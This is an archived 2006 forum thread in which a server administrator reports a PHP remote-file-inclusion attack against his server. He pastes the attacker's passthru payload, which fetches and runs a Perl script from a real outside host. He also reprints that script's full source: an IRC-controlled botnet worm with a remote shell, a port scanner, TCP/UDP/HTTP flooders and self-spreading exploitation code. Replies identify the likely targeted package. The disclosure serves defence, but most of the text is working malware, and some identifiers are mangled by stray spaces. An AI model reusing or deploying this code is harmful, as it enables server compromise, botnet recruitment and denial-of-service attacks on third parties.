473,699 Members | 3,186 Online
Bytes | Software Development & Data Engineering Community
+ Post

Home Posts Topics Members FAQ

PHP/Perl/Unix Virus: delete config.php files asap

There were some strange requests to my server asking for config.php
file (which I do not have in the requested location).

I did some investigation. Seems to be a virus written in perl,
exploiting a vulnerability in php code.

The requests are like this

216.120.231.252 - - [30/Aug/2006:13:28:03 -0500] "GET /algebra/about/history/config.php?retu rnpath=http://domates.1gig.bi z/spread.txt? HTTP/1.1" 404 561 "-" "libwww-perl/5.805"

File spread.txt contains this:

<?
passthru('cd /tmp;wget http://domates.1gig.biz/tmr;perl tmr;rm -f tmr*');
passthru('cd /tmp;curl -O http://domates.1gig.biz/tmr;perl tmr;rm -f tmr*');
passthru('cd /tmp;lwp-download http://domates.1gig.biz/tmr;perl tmr;rm -f tmr*');
passthru('cd /tmp;lynx -source http://domates.1gig.biz/tmr >tmr;perl tmr;rm -f tmr*');
passthru('cd /tmp;fetch http://domates.1gig.biz/tmr >tmr;perl tmr;rm -f tmr*');
passthru('cd /tmp;GET http://domates.1gig.biz/tmr >tmr;perl tmr;rm -f tmr*');
?>

That script, obviously, tries very hard to download and execute 'tmr'.

'tmr' is, apparently, a perl script whose job SEEMS to be to listen on
IRC channels or some such and spread around by abusing a vulnerability
in 'config.php'. It is also seemingly used for DDOSing some servers
and who knows what else (shell function etc).

If the guy was smart, he's probably run some obfuscator on his code,
to make it harder to read.

I did a locate command on my fedora systems and found config.php in
some package called 'squirrelmail'. Which I immediately deleted, even
though it was not accessible through the web, just sitting there, but
I just do not want it.

My main question is, just what package or program owns config.php that
si vulnerable. It is a generic file name, so I would not be so quick
to suspect squirrelmail.

Here's the 'tmr' script:

#!/usr/bin/perl

# VulnScan v6 Stable By Morgan
#
# Note:
# DO NOT REMOVE COPYRIGHTS ...
# www.priv8.com.ar
#
# [Morgan]: http://priv8.com.ar/Zerocool.jpg
# [Morgan]: u got owned
# [ZEROCOOL]: bro
# [ZEROCOOL]: it's a rbot
# [ZEROCOOL]: i'm not fuckingstupid
# [ZEROCOOL]: uahuahuahuahua
#
#
# Greets to irc.gigachat.ne t :: #Morgan
#
#
# To work with auto-spread :
# Create a file named spread.txt with this :
#
# <?
# passthru('cd /tmp;wget http://priv8.com.ar/v6;perl v6;rm -f v6*');
# passthru('cd /tmp;curl -O http://priv8.com.ar/v6;perl v6;rm -f v6*');
# passthru('cd /tmp;lwp-download http://priv8.com.ar/v6;perl v6.txt;rm -f v6*');
# passthru('cd /tmp;lynx -source http://priv8.com.ar/v6 >v6;perl v6;rm -f v6*');
# passthru('cd /tmp;fetch http://priv8.com.ar/v6 >v6;perl v6;rm -f v6*');
# passthru('cd /tmp;GET http://priv8.com.ar/v6 >v6;perl v6;rm -f v6*');
# ?>
#
# Change the url .. put ur bot url in that file
# then use the command :
#
# !morgan !eval @cmdstring='htt p://yoursite.com/spread.txt';
# or directly change it from the code..
#
# Enjoy the bot ....
# /Morgan
my $processo = '[sys]';
use HTTP::Request;
use LWP::UserAgent;

#CONFIGURATION
my $linas_max='4';
my $sleep='5';
my @gstring='www.p riv8.com.ar';
my @cmdstring='htt p://domates.1gig.bi z/spread.txt';
my @adms=("h1dd3n" ,"Tamer");
my @canais=("#tame rlinux");
my $nick='Linux-';
my $ircname ='linux';
chop (my $realname = `uname -a`);
$servidor='h1dd 3n.pikolata.net ' unless $servidor;
my $porta='6121';
my $VERSAO = 'Vulnscan v6 www.priv8.com.a r';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$servidor="$ARG V[0]" if $ARGV[0];
$0="$processo". "\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();

$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}
# V6 OWNED YOUR BOX
# www.priv8.com.ar
# irc.gigachat.ne t - #Morgan
sub conectar {
my $meunick = $_[0];
my $servidor_con = $_[1];
my $porta_con = $_[2];

my $IRC_socket = IO::Socket::INE T->new(Proto=>"tc p", PeerAddr=>"$ser vidor_con", PeerPort=>$port a_con) or return(1);
if (defined($IRC_s ocket)) {
$IRC_cur_socket = $IRC_socket;

$IRC_socket->autoflush(1) ;
$sel_cliente->add($IRC_socke t);

$irc_servers{$I RC_cur_socket}{ 'host'} = "$servidor_con" ;
$irc_servers{$I RC_cur_socket}{ 'porta'} = "$porta_con ";
$irc_servers{$I RC_cur_socket}{ 'nick'} = $meunick;
$irc_servers{$I RC_cur_socket}{ 'meuip'} = $IRC_socket->sockhost;
nick("$meunick" );
sendraw("USER $ircname ".$IRC_sock et->sockhost." $servidor_con :$realname");
sleep 1;
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_se rvers))) { conectar("$nick ", "$servidor" , "$porta"); }
delete($irc_ser vers{''}) if (defined($irc_s ervers{''}));
my @ready = $sel_cliente->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$meunick = $irc_servers{$I RC_cur_socket}{ 'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_cliente->remove($fh);
$fh->close;
delete($irc_ser vers{$fh});
}
@lines = split (/\n/, $msg);

for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_tem p.$line if ($line_temp);
$line_temp='';
$line =~ s/\r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
parse("$line");
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}

sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?) \@(.+?) PRIVMSG (.+?) \:(.+)/) {
my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
if ($args =~ /^\001VERSION\00 1$/) {
notice("$pn", "\001VERSIO N mIRC v6.16 Khaled Mardam-Bey\001");
}
if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
if ($onde eq "$meunick") {
shell("$pn", "$args");
}
if ($args =~ /^(\Q$meunick\E| \!say)\s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
if ($arg =~ /^\!(.*)/) {
ircase("$pn","$ onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
} elsif ($arg =~ /^\@(.*)/) {
$ondep = $onde;
$ondep = $pn if $onde eq $meunick;
bfunc("$ondep", "$1");
} else {
shell("$onde", "$arg");
}
}
}
}
elsif ($servarg =~ /^\:(.+?)\!(.+?) \@(.+?)\s+NICK\ s+\:(\S+)/i) {
if (lc($1) eq lc($meunick)) {
$meunick=$4;
$irc_servers{$I RC_cur_socket}{ 'nick'} = $meunick;
}
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick("$meunick| ".int rand(999999));
} elsif ($servarg =~ m/^\:(.+?)\s+001\ s+(\S+)\s/i) {
$meunick = $2;
$irc_servers{$I RC_cur_socket}{ 'nick'} = $meunick;
$irc_servers{$I RC_cur_socket}{ 'nome'} = "$1";
foreach my $canal (@canais) {
sendraw("JOIN $canal ddosit");
}
}
}

# V6 OWNED YOUR BOX
# www.priv8.com.ar
# irc.gigachat.ne t - #Morgan
sub bfunc {
my $printl = $_[0];
my $funcarg = $_[1];
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my @portas=("21"," 22","23","25"," 80","113","135" ,"445","1025"," 5000","6660","6 661","6662","66 63","6665","666 6","6667","6668 ","6669","7000" ,"8080","8018") ;
my (@aberta, %porta_banner);
sendraw($IRC_cu r_socket, "PRIVMSG $printl :\002[SCAN]\002 Scanning ".$1." for open ports.");
foreach my $porta (@portas) {
my $scansock = IO::Socket::INE T->new(PeerAddr =$hostip, PeerPort =$porta, Proto ='tcp', Timeout =4);
if ($scansock) {
push (@aberta, $porta);
$scansock->close;
}
}

if (@aberta) {
sendraw($IRC_cu r_socket, "PRIVMSG $printl :\002[SCAN]\002 Open port(s): @aberta");
} else {
sendraw($IRC_cu r_socket,"PRIVM SG $printl :\002[SCAN]\002 No open ports found");
}
}
if ($funcarg =~ /^tcpflood\s+(.* )\s+(\d+)\s+(\d +)/) {
sendraw($IRC_cu r_socket, "PRIVMSG $printl :\002[TCP DDoSing]\002 Attacking ".$1.":".$2 ." for ".$3." seconds.");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($3>$cur_time){
$cur_time = time - $itime;
&tcpflooder("$1 ","$2","$3" );
}
sendraw($IRC_cu r_socket, "PRIVMSG $printl :\002[TCP DDoSing]\002 Attack done ".$1.":".$2."." );
}
if ($funcarg =~ /^version/) {
sendraw($IRC_cu r_socket, "PRIVMSG $printl :\002[VERSION]\002 w0rmb0t ver ".$VERSAO);
}
#SCANNER
if ($funcarg =~ /^rfiscan\s+(\d+ )\s+(.*)/) {
$boturl=$2;
sendraw($IRC_cu r_socket, "PRIVMSG $printl :\002[v6]\002 Scan started.");
srand;
my $itime = time;
my ($cur_time);
my ($exploited);
$boturl=$2;
$cur_time = time - $itime;$exploit ed = 0;
while($1>$cur_t ime){
$cur_time = time - $itime;
@urls=fetch();
foreach $url (@urls) {
$cur_time = time - $itime;
#sendraw($IRC_c ur_socket, "PRIVMSG #debug :\002[v6|Exploiting]\002 ".$url2."\n\n") ;
my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;
$url2 ="http://".$path."/".$boturl."@cmd string?";

print "\n".$url2."\n\ n";
# V6 OWNED YOUR BOX
# www.priv8.com.ar
# irc.gigachat.ne t - #Morgan

my $req=HTTP::Requ est->new(GET=>$url2 );
my $ua=LWP::UserAg ent->new();
$ua->timeout(10);
my $response=$ua->request($req );

if ($response->is_success) {
if( $response->content =~ /By/ && $response->content =~ /Morgan/ ){
sendraw($IRC_cu r_socket, "PRIVMSG $printl :\002[v6|VULN]\002 ".$url2." \n\n");
}
}
else {
print 'Errore: ',$path,$respon se->status_line, "\n";
}
}
}
sendraw($IRC_cu r_socket, "PRIVMSG $printl :\002[v6]\002 Scan finished in ".$1." seconds.");
}
if ($funcarg =~ /^httpflood\s+(. *)\s+(\d+)/) {
sendraw($IRC_cu r_socket, "PRIVMSG $printl :\002[HTTP DDoSing]\002 Attacking ".$1.":80 for ".$2." seconds.");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($2>$cur_time){
$cur_time = time - $itime;
my $socket = IO::Socket::INE T->new(proto=>'tc p', PeerAddr=>$1, PeerPort=>80);
print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConne ction: Keep-Alive\r\n\r\n";
close($socket);
}
sendraw($IRC_cu r_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking done ".$1.".");
}
if ($funcarg =~ /^udpflood\s+(.* )\s+(\d+)\s+(\d +)/) {
sendraw($IRC_cu r_socket, "PRIVMSG $printl :\002[UDP DDoSing]\002 Attacking ".$1." with ".$2." Kb packets for ".$3." seconds.");
my ($dtime, %pacotes) = udpflooder("$1" , "$2", "$3");
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $2 * $pacotes{igmp};
$bytes{icmp} = $2 * $pacotes{icmp};
$bytes{o} = $2 * $pacotes{o};
$bytes{udp} = $2 * $pacotes{udp};
$bytes{tcp} = $2 * $pacotes{tcp};
sendraw($IRC_cu r_socket, "PRIVMSG $printl :\002[UDP]\002 Sent ".int(($bytes{i cmp}+$bytes{igm p}+$bytes{udp} + $bytes{o})/1024)." Kb in ".$dtime." seconds to ".$1.".");
}
exit;
}
}
}
# V6 OWNED YOUR BOX
# www.priv8.com.ar
# irc.gigachat.ne t - #Morgan
sub ircase {
my ($kem, $printl, $case) = @_;

if ($case =~ /^join (.*)/) {
j("$1");
}
if ($case =~ /^part (.*)/) {
p("$1");
}
if ($case =~ /^rejoin\s+(.*)/) {
my $chan = $1;
if ($chan =~ /^(\d+) (.*)/) {
for (my $ca = 1; $ca <= $1; $ca++ ) {
p("$2");
j("$2");
}
} else {
p("$chan");
j("$chan");
}
}
if ($case =~ /^op/) {
op("$printl", "$kem") if $case eq "op";
my $oarg = substr($case, 3);
op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^deop/) {
deop("$printl", "$kem") if $case eq "deop";
my $oarg = substr($case, 5);
deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^msg\s+(\S+) (.*)/) {
msg("$1", "$2");
}
if ($case =~ /^flood\s+(\d+)\ s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
msg("$2", "$3");
}
}
if ($case =~ /^ctcp\s+(\S+) (.*)/) {
ctcp("$1", "$2");
}
if ($case =~ /^ctcpflood\s+(\ d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
ctcp("$2", "$3");
}
}
if ($case =~ /^nick (.*)/) {
nick("$1");
}
if ($case =~ /^connect\s+(\S+ )\s+(\S+)/) {
conectar("$2", "$1", 6667);
}
if ($case =~ /^raw (.*)/) {
sendraw("$1");
}
if ($case =~ /^eval (.*)/) {
eval "$1";
}
}
# V6 OWNED YOUR BOX
# www.priv8.com.ar
# irc.gigachat.ne t - #Morgan
sub shell {
my $printl=$_[0];
my $comando=$_[1];
if ($comando =~ /cd (.*)/) {
chdir("$1") || msg("$printl", "No such file or directory");
return;
}
elsif ($pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my @resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (@resp) {
$c++;
chop $linha;
sendraw($IRC_cu r_socket, "PRIVMSG $printl :$linha");
if ($c == "$linas_max ") {
$c=0;
sleep $sleep;
}
}
exit;
}
}
}
# V6 OWNED YOUR BOX
# www.priv8.com.ar
# irc.gigachat.ne t - #Morgan
sub tcpflooder {
my $itime = time;
my ($cur_time);
my ($ia,$pa,$proto ,$j,$l,$t);
$ia=inet_aton($ _[0]);
$pa=sockaddr_in ($_[1],$ia);
$ftime=$_[2];
$proto=getproto byname('tcp');
$j=0;$l=0;
$cur_time = time - $itime;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
socket($t,PF_IN ET,SOCK_STREAM, $proto);
connect($t,$pa) ||$j--;
$j++;$l++;
}
$l=0;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
shutdown($t,2);
$l++;
}
}
# V6 OWNED YOUR BOX
# www.priv8.com.ar
# irc.gigachat.ne t - #Morgan
sub udpflooder {
my $iaddr = inet_aton($_[0]);
my $msg = 'A' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;

socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;

socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $porta = 1; $porta <= 65000; $porta++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($po rta, $iaddr)) and $pacotes{igmp}+ +;
send(SOCK2, $msg, 0, sockaddr_in($po rta, $iaddr)) and $pacotes{udp}++ ;
send(SOCK3, $msg, 0, sockaddr_in($po rta, $iaddr)) and $pacotes{icmp}+ +;
send(SOCK4, $msg, 0, sockaddr_in($po rta, $iaddr)) and $pacotes{tcp}++ ;

for (my $pc = 3; $pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($po rta, $iaddr)) and $pacotes{o}++;
}
}
last if $cur_time >= $ftime;
}
return($cur_tim e, %pacotes);
}

sub ctcp {
return unless $#_ == 1;
sendraw("PRIVMS G $_[0] :\001$_[1]\001");
}
sub msg {
return unless $#_ == 1;
sendraw("PRIVMS G $_[0] :$_[1]");
}
sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
return unless $#_ == 1;
sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
return unless $#_ == 1;
sendraw("MODE $_[0] -o $_[1]");
}
sub j { &join(@_); }
sub join {
return unless $#_ == 0;
sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {
sendraw("PART $_[0]");
}
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
sub quit {
sendraw("QUIT :$_[0]");
}

# V6 OWNED YOUR BOX
# www.priv8.com.ar
# irc.gigachat.ne t - #Morgan

sub fetch(){
my $rnd=(int(rand( 9999)));
my $n= 80;
if ($rnd<5000) { $n<<=1;}
my $s= (int(rand(10)) * $n);
{
my @dominios = ("nodom");
my @str;

foreach $dom (@dominios)
{
push (@str,"@gstring ");
}

my $query="www.goo gle.com/search?q=";
$query.=$str[(rand(scalar(@s tr)))];
$query.="&num=$ n&start=$s";
my @lst=();
#sendraw("privm sg #Morgan :DEBUG only test googling: ".$query."" );
my $page = http_query($que ry);
while ($page =~ m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){
if ($1 !~ m/google|cache|tr anslate/){
push (@lst,$1);
}
}
return (@lst);
}

sub http_query($){
my ($url) = @_;
my $host=$url;
my $query=$url;
my $page="";
$host =~ s/href=\"?http:\/\///;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~s/$host//;
if ($query eq "") {$query="/";};
eval {
local $SIG{ALRM} = sub { die "1";};
alarm 10;
my $sock = IO::Socket::INE T->new(PeerAddr=> "$host",PeerPor t=>"80",Proto=> "tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept : */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page="@r";
alarm 0;
close($sock);
};

return $page;
}
}
# V6 OWNED YOUR BOX
# www.priv8.com.ar
# irc.gigachat.ne t - #Morgan

# NOTE: DONT REMOVE COPYRIGHTS

Aug 30 '06 #1
4 10623
Ignoramus6539 wrote:
There were some strange requests to my server asking for config.php
file (which I do not have in the requested location).
Nice one Ignoramus6539
I did some investigation. Seems to be a virus written in perl,
exploiting a vulnerability in php code.
Sure looks like it. Is anyone daft enough to include($get_pa rameter)?
I did a locate command on my fedora systems and found config.php in
some package called 'squirrelmail'. Which I immediately deleted, even
though it was not accessible through the web, just sitting there, but
I just do not want it.
Oooh. "Some package called...' sloppy housekeeping!

Actually, although Squirrelmail was vulnerable to this kind of attack
(http://www.sans.org/resources/malwar...99d19913a177c2,
http://www.idefense.com/intelligence...lay.php?id=191)
the developers are relatively good about releasing fixes.

Your attacker seems to be looking for phpListPro
(http://www.frsirt.com/english/advisories/2006/1325).

Usually script kiddies don't look to see what you're running before
unleashing all their dogs on your servers.
My main question is, just what package or program owns config.php that
si vulnerable. It is a generic file name, so I would not be so quick
to suspect squirrelmail.
Next time try Google first :) and give us a URL for the code.

C.

Aug 30 '06 #2
On Wed, 30 Aug 2006 19:45:54 GMT, Colin McKinnon <co************ **********@ntlw orld.deletemeun lessURaBot.comw rote:
Ignoramus6539 wrote:
>There were some strange requests to my server asking for config.php
file (which I do not have in the requested location).

Nice one Ignoramus6539
>I did some investigation. Seems to be a virus written in perl,
exploiting a vulnerability in php code.

Sure looks like it. Is anyone daft enough to include($get_pa rameter)?
I think that the get parameter was mentioned in the access_log line.
>I did a locate command on my fedora systems and found config.php in
some package called 'squirrelmail'. Which I immediately deleted, even
though it was not accessible through the web, just sitting there, but
I just do not want it.
Oooh. "Some package called...' sloppy housekeeping!
Yep. Point taken.
Actually, although Squirrelmail was vulnerable to this kind of attack
(http://www.sans.org/resources/malwar...99d19913a177c2,
http://www.idefense.com/intelligence...lay.php?id=191)
the developers are relatively good about releasing fixes.

Your attacker seems to be looking for phpListPro
(http://www.frsirt.com/english/advisories/2006/1325).

Usually script kiddies don't look to see what you're running before
unleashing all their dogs on your servers.
Absolutely. They probably googled for some keywords on phpListPro and
found them under /algebra/about/history/ directory.
>My main question is, just what package or program owns config.php that
si vulnerable. It is a generic file name, so I would not be so quick
to suspect squirrelmail.
Next time try Google first :) and give us a URL for the code.
Well, I thought that the URLs might disappear soon. If you would like
me to place code on my own webpage, I will be glad to do so.

i

Aug 30 '06 #3
Colin McKinnon wrote:
Ignoramus6539 wrote:
Whoops - sorry for cross-posting the reply too.

(rec.crafts.met alworking????)

C.
Aug 30 '06 #4
On Wed, 30 Aug 2006 20:22:50 GMT, Colin McKinnon
<co************ **********@ntlw orld.deletemeun lessURaBot.comw rote:
>Whoops - sorry for cross-posting the reply too.

(rec.crafts.me talworking????)
S'Okay, mostly. Leave it in, we might learn something.

Igor hangs out in r.c.m all the time, and more than a few of the
people here are Linux Nerds as well as machinists. ;-) (I need to
learn it.) So I guess he thinks it's relevant enough to crosspost it
here, and I for one will humor him on it.

--<< Bruce >>--

Aug 31 '06 #5

This thread has been closed and replies have been disabled. Please start a new discussion.

Similar topics

6
5948
by: John Smith | last post by:
Hello, I have a rather odd question. My company is an all java/oracle shop. We do everything is Java... no matter what it is... parsing of text files, messaging, gui you name it. My question is this... is Perl so much better at parsing text files and outputing that we would see a substantial speed increase? We process about 10 million records in flat files a day for reformatting before putting them in a DB. Also, when it comes to...
14
2570
by: Xah Lee | last post by:
Just bumped into another irresponsibility in perl. the crime in question this time is the module File::Basename. Reproduction: 1. create a directory containing a file of this name: "cdrom.html". 2. "use File::Basename;", with the line: ($name,$path,$suffix) = fileparse($File::Find::name, ('.html', '.m'));
1
3725
by: Xah Lee | last post by:
suppose you want to do find & replace of string of all files in a directory. here's the code: ©# -*- coding: utf-8 -*- ©# Python © ©import os,sys © ©mydir= '/Users/t/web'
3
6547
by: dpackwood | last post by:
Hello, I have two different scripts that do pretty much the same thing. The main perl script is on Windows. It runs and in the middle of it, it then calls out another perl script that then should run on a Unix box I have. Both scripts run ok, except for the part when Windows try's to call out the Unix script. I have it set up where the Unix is mapped through a drive letter and can drop stuff into the Unix box. It is going through another...
1
17717
by: Al Belden | last post by:
Hi all, I've been working on a problem that I thought might be of interest: I'm trying to replace some korn shell scripts that search source code files with perl scripts to gain certain features such as: More powerful regular expressions available in perl Ability to print out lines before and after matches (gnu grep supports this but is not availble on our Digital Unix and AIX platforms) Make searches case insensitive by default (yes, I...
0
9741
by: Kirt Loki Dankmyer | last post by:
So, I download the latest "stable" tar for perl (5.8.7) and try to compile it on the Solaris 8 (SPARC) box that I administrate. I try all sorts of different switches, but I can't get it to compile. I need it to be compiled with threads. Anyone have any wisdom on how best to do this? Here's a transcript of my latest attempt. It's long; you might want to skip to the bottom, where I try "make" and the fatal errors start happening.
2
1635
by: kukukgl | last post by:
Hi All, I am a newbie to perl and unix sh script. Hey I facing a problem to run a command in perl... my $sourceCleanCmd = "find /www/srs -name \*.jsp -exec rm {} \;"; my $isSourceClean = system("$sourceCleanCmd") == 0 or die( "Can't run command $sourceCleanCmd" ); if ( $isSourceClean ) { print "Source Clean Process Completed\n"; }else { print "Source Clean Process Failed\n";
4
2531
by: jonathan184 | last post by:
Hi I have a perl script, basically what it is suppose to do is check a folder with files. Now the files are checked using a timestamp with the command ls -l so the timestamp in this format is checked. Now what the script does is it checks the time stamp and creates a year folder if it does not exist and then creates a month folder if it does not exist and puts the respective files in the month folders. If the files are created this month then it...
10
6971
by: happyse27 | last post by:
Hi All, I got this apache errors(see section A1 and A2 below) when I used a html(see section b below) to activate acctman.pl(see section c below). Section D below is part of the configuration of section c. Not sure where went wrong as the web page displayed internal server error. Also, what is the error 543? and error 2114. Where to find the list of errors in websites as it is not the standard apache error. I could not find...
0
8704
marktang
by: marktang | last post by:
ONU (Optical Network Unit) is one of the key components for providing high-speed Internet services. Its primary function is to act as an endpoint device located at the user's premises. However, people are often confused as to whether an ONU can Work As a Router. In this blog post, we’ll explore What is ONU, What Is Router, ONU & Router’s main usage, and What is the difference between ONU and Router. Let’s take a closer look ! Part I. Meaning of...
0
8623
by: Hystou | last post by:
Most computers default to English, but sometimes we require a different language, especially when relocating. Forgot to request a specific language before your computer shipped? No problem! You can effortlessly switch the default language on Windows 10 without reinstalling. I'll walk you through it. First, let's disable language synchronization. With a Microsoft account, language settings sync across devices. To prevent any complications,...
0
9187
Oralloy
by: Oralloy | last post by:
Hello folks, I am unable to find appropriate documentation on the type promotion of bit-fields when using the generalised comparison operator "<=>". The problem is that using the GNU compilers, it seems that the internal comparison operator "<=>" tries to promote arguments from unsigned to signed. This is as boiled down as I can make it. Here is my compilation command: g++-12 -std=c++20 -Wnarrowing bit_field.cpp Here is the code in...
0
9053
jinu1996
by: jinu1996 | last post by:
In today's digital age, having a compelling online presence is paramount for businesses aiming to thrive in a competitive landscape. At the heart of this digital strategy lies an intricately woven tapestry of website design and digital marketing. It's not merely about having a website; it's about crafting an immersive digital experience that captivates audiences and drives business growth. The Art of Business Website Design Your website is...
1
8936
by: Hystou | last post by:
Overview: Windows 11 and 10 have less user interface control over operating system update behaviour than previous versions of Windows. In Windows 11 and 10, there is no way to turn off the Windows Update option using the Control Panel or Settings app; it automatically checks for updates and installs any it finds, whether you like it or not. For most users, this new feature is actually very convenient. If you want to control the update process,...
0
4390
by: TSSRALBI | last post by:
Hello I'm a network technician in training and I need your help. I am currently learning how to create and manage the different types of VPNs and I have a question about LAN-to-LAN VPNs. The last exercise I practiced was to create a LAN-to-LAN VPN between two Pfsense firewalls, by using IPSEC protocols. I succeeded, with both firewalls in the same network. But I'm wondering if it's possible to do the same thing, with 2 Pfsense firewalls...
0
4636
by: adsilva | last post by:
A Windows Forms form does not have the event Unload, like VB6. What one acts like?
2
2360
muto222
by: muto222 | last post by:
How can i add a mobile payment intergratation into php mysql website.
3
2015
bsmnconsultancy
by: bsmnconsultancy | last post by:
In today's digital era, a well-designed website is crucial for businesses looking to succeed. Whether you're a small business owner or a large corporation in Toronto, having a strong online presence can significantly impact your brand's success. BSMN Consultancy, a leader in Website Development in Toronto offers valuable insights into creating effective websites that not only look great but also perform exceptionally well. In this comprehensive...

By using Bytes.com and it's services, you agree to our Privacy Policy and Terms of Use.

To disable or enable advertisements and analytics tracking please visit the manage ads & tracking page.